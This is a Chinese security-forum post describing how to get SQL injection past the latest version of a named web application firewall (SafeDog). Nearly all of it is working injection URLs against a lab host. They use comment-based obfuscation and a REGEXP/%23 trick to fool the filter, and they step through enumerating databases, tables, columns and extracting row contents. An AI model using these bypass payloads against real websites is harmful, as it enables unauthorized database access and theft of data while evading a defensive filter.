安全矩阵

 找回密码
 立即注册
搜索
查看: 2613|回复: 0

sql注入bypass最新版某狗

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2022-5-10 13:03:12 | 显示全部楼层 |阅读模式
原文链接:sql注入bypass最新版某狗

安全狗最新版本



and绕过

http://192.168.111.16/index.php?id=1%20and%20/!500011/=/!500011/

http://192.168.111.16/index.php?id=1%20and%20/!500011/=/!500012/

http://192.168.111.16/index.php?id=if((1=2),1,1)

http://192.168.111.16/index.php?id=1%20and/%!%22//1=1%20--%20+

order by 绕过

/*%!*干扰

http://192.168.111.16/index.php?id=1/%2a%%2f/order/%2f%2f/by/%2f%2f/2


union select 绕过



获取当前数据库和用户





数据库同理

http://192.168.111.16/index.php?id=-1/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,database(/%2f%2f/)




获取数据库表

http://192.168.111.16/index.php?id=1/%2a%%2f/union/%2f%2f//!50441select//%2f%2f/1,group_concat(table_name)%20from%20information_schema.tables%20where%20/wad/table_schema=database(////)

不拦截

http://192.168.111.16/index.php?id=-1%20/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3%20%20%0a%20%20from%20information_schema.tables%20where%20table_schema=database(////)

拦截

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3  %0a  from information_schema.tables where table_schema=database(////)

这里其实REGEXP "[…任意%23]"就行,在url解码%23变成了#,安全狗认为后面全都成为了注释符,带入到mysql层面其实%23只是正则的一个参数并不是注释符


获取表字段

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(column_name),3  %0a  from information_schema.columns where table_name="newss"

获取数据

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,content,3  %0a  from newss









本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 06:56 , Processed in 0.015933 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表